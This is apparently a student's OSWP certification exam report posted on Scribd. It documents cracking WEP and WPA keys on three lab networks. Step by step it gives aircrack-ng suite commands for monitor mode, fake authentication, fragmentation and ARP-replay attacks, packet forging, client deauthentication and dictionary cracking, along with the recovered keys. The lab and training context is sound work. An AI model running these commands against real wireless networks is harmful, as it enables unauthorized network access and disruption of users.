Scribd
Upload
582 views18 pages

D OSWP-Report

Uploaded by

Stephen Anderson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
582 views18 pages

D OSWP-Report

Uploaded by

Stephen Anderson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

Offensive Security

OSWP Exam Documentation


v.1.0

EMAIL

OSID: OS-XXXXX

©
All rights reserved to Offensive Security, 2020.

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast
for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written
permission from Offensive-Security.

1 | Page
Table of Contents

Table of Contents 1

1.0 Offensive-Security OSWP Exam Documentation 2

2.0 STAGE 1 3

2.1 Wireless Network Key 4

2.2 Screenshots 4

2.3 Steps 5

3.0 STAGE 2 10

3.1 Wireless Network Key 10

3.2 Screenshots 10

3.3 Steps 11

4.0 STAGE 3 15

4.1 Wireless Network Key 15

4.2 Screenshots 15

4.3 Steps 15

5.0 Additional Items Not Mentioned in the Report 19

2 | Page
1.0 Offensive-Security OSWP Exam Documentation

3 | Page
2.0 STAGE 1

2.1 Wireless Network Key

[ DE:AD:CA:FE:BA:BE:99:77:55:33:11:88:66 ]

2.2 Screenshots

2.3 Steps
4 | Page
In the first we need to know our wireless card name so i used iwconfig command and I got my network
card called wlan0

Then we need to start monitor mode using this command airmon-ng start wlan0

5 | Page
Then I started to discover all of the networks to get the first stage , channel and BSSID by using this
command airodump-ng mon0

Now I got all I need so lets run listen on the network only by using this command

airodump-ng -c 3 --bssid 1C:7E:E5:41:E5:CB mon0 –w Stage1

Then I tried to fake authentication with the targeted network using this command

aireplay-ng -1 0 -e ‘STAGE 1’ -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e mon0

6 | Page
But this network has no clients inside and in the same time I want to get IVs so I tried to do
fragmentation attack by using this command

aireplay-ng -5 -b 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e mon0

7 | Page
So now I got the KeyStream file so I can do new packet by using this command

packetforge-ng -0 -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e -l 192.168.1.101 -k 192.168.1.255 -y


fragment-0209-121548.xor –w Stage1

Then we can use aireplay to inject the forged packet using this command
aireplay-ng -2 -r Stage1 mon0

So now we doing traffic to gain the data

Then let’s crack our cap file by using this command aircrack-ng -0 Stage1-01.cap

8 | Page
3.0 STAGE 2

3.1 Wireless Network Key

[ DE:AD:BE:EF:CA:FE:99:77:55:33:11:88:67 ]

3.2 Screenshots

3.3 Steps

In the first we need to know our wireless card name so i used iwconfig command and I got my
network

card called wlan0

9 | Page
Then we need to start monitor mode using this command airmon-ng start wlan0

Then I started to discover all of the networks to get the first stage , channel and BSSID by using this
command airodump-ng mon0

10 | Page
Now I got all I need so lets run listen on the network only by using this command

airodump-ng -C 11 --bssid 00:14:D1:E1:C7:62 mon0 -w Stage2

Let’s try to do fake authentication by using this command

aireplay-ng -1 0 -e “STAGE 2” -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0

Then we need to de-authenticate the associated client to gain the xor file

11 | Page
aireplay-ng -1 0 -e ‘STAGE 2’ -y Stage2-01-00-14-D1-E1-C7-62.xor -h 00:c0:ca:36:22:9e mon0

aireplay-ng --arpreplay -b 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0

12 | Page
let’s take a look at Data

aircrack-ng -0 Stage2-01.cap

13 | Page
4.0 STAGE 3

4.1 Wireless Network Key

[ massacre]

4.2 Screenshots

4.3 Steps

In the first we need to know our wireless card name so i used iwconfig command and I got my
network

card called wlan0

14 | Page
Then we need to start monitor mode using this command airmon-ng start wlan0

Then I started to discover all of the networks to get the first stage , channel and BSSID by using this

command airodump-ng mon0

15 | Page
airodump-ng -c 6 --bssid 00:08:A1:CA:3E:CD mon0 -w stage3

aireplay-ng -0 1 -a 00:08:A1:CA:3E:CD -c 00:c0:ca:30:f1:91 mon0

aircrack-ng -0 -w /root/psk-crack-dictionary stagex-01.cap

16 | Page
17 | Page
5.0 Additional Items Not Mentioned in the Report

This section is placed for any additional items that were not mentioned in the overall report.

18 | Page

You might also like